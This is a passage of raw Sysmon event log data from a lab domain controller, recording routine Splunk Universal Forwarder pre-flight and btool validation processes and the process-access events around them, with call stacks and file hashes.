Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.927{08A6967A-4327-6000-D100-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.875{08A6967A-4327-6000-D000-000000009A01}47004724C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4327-6000-D000-000000009A01}4700C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4327-6000-D000-000000009A01}4700C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4327-6000-CF00-000000009A01}44404444C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4327-6000-D000-000000009A01}4700C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.635{08A6967A-4327-6000-D000-000000009A01}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4327-6000-CF00-000000009A01}4440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000003881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4327-6000-CF00-000000009A01}4440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4327-6000-CF00-000000009A01}4440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.625{08A6967A-4326-6000-CA00-000000009A01}30843076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4327-6000-CF00-000000009A01}4440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.628{08A6967A-4327-6000-CF00-000000009A01}4440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT 